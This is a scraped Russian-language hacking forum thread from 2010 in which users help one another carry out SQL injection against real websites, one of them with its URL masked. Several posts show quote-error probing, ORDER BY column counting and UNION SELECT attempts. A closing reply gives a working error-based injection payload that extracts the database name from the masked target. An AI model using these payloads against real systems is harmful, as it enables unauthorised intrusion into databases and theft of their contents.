29.01.2010, 10:45
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 6
Провел на форуме:
313054
Репутация:
0
|
|
Сообщение от xxakerx
Простите за глупый вопрос но все таки я его снова подниму....
Операционная система Vista.
Поиска WI FI сетей и там находит безымянную сеть не зашифрованную....
Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(
Сломал мозг, ты же сам ответил на свой вопрос!!1 Онотоле
|
|
|
29.01.2010, 17:29
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Имеется иньекция, при подставлени кавычки выдает следующее:
Код:
select surname, name, patronymic from people where id = 851'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 4
Проверяю:
В первом случае выводит, во втором пусто, -> иньекция
Составляю запрос вида:
Код:
+union+select+1,2,3+--+
В ответ получаю:
Код:
select * from people where id = 851 union select 1,2,3 --
The used SELECT statements have a different number of columns
Почему во втором запросе исчезают значения, которые берет он сам, и что с этим можно сделать? |
|
|
|
29.01.2010, 17:33
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.
|
|
|
|
29.01.2010, 17:42
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от ILYAtirtir
Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.
Так он же раскрывает полностью запрос при подставлении кавычки
Код:
select surname, name, patronymic from people where id = 851'
Впрочем проверяю:
Код:
+order+by+1
+order+by+1,2
+order+by+1,2,3
Выводит нормально
Код:
select surname, name, patronymic from people where id = 851 order by 1,2,3,4
Unknown column '4' in 'order clause'
|
|
|
|
29.01.2010, 17:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от _iks_
Так он же раскрывает полностью запрос при подставлении кавычки
Код:
select surname, name, patronymic from people where id = 851'
Впрочем проверяю:
Код:
+order+by+1
+order+by+1,2
+order+by+1,2,3
Выводит нормально
Код:
select surname, name, patronymic from people where id = 851 order by 1,2,3,4
Unknown column '4' in 'order clause'
Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --
|
|
|
|
29.01.2010, 17:52
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от Ctacok
Блин ты вообще прочитал тему?
Переберай колонки епте.
union select 1,2,3,4 --
Да делал я всё, делал. Перебирал до 20. Там вывод везде одинаковый, и только когда "union select 1,2,3" то вместо имён колонок ставит звёздочку.
Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html
Спасибо, сейчас посмотрю
|
|
|
|
29.01.2010, 17:46
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
http://forum.antichat.ru/threadnav119047-2-10.html
|
|
|
|
30.01.2010, 17:57
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
_iks_
кинь сюда ссылку или в ЛС, так быстрее будет!
|
|
|
|
30.01.2010, 21:36
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
немогу с одной уязвимостью разобратся..
http://****.ru/?лала=11940238')
Выводит ошыбку>
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1
Делаю>
http://****.ru/?лала=119402381+order+by+1/*
Все идет
Когда делаю вот так>
http://****.ru/?лала=-119402381+order+by+2--
то выходит белый экран
а так>
http://****.ru/?лала=-119402381+order+by+3--
Query failed: Unknown column '3' in 'order clause'
Пробовал разные методы с UNION SELECT и нечего не найду, делаю такой запрос
http://****.ru/?лала=119402381+AND+1=1+union+select+1,2/*
и все время выходит
Query failed: The used SELECT statements have a different number of columns
Подскажите пожалуйста что делать...
я знаю что там
DB Server:MySQL >=5
Последний раз редактировалось [Feldmarschall]; 30.01.2010 в 22:42..
|
|
|
|
30.01.2010, 22:10
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Выводи инфу в ошибку
pid=119402381+or(1,1)=(select+count(0),concat((sel ect+database()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)group+by+2)--+
Query failed: Duplicate entry 'bfstats1' for key 1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1864954){kind=avatar}
Похожие темы
Комбинированный вид
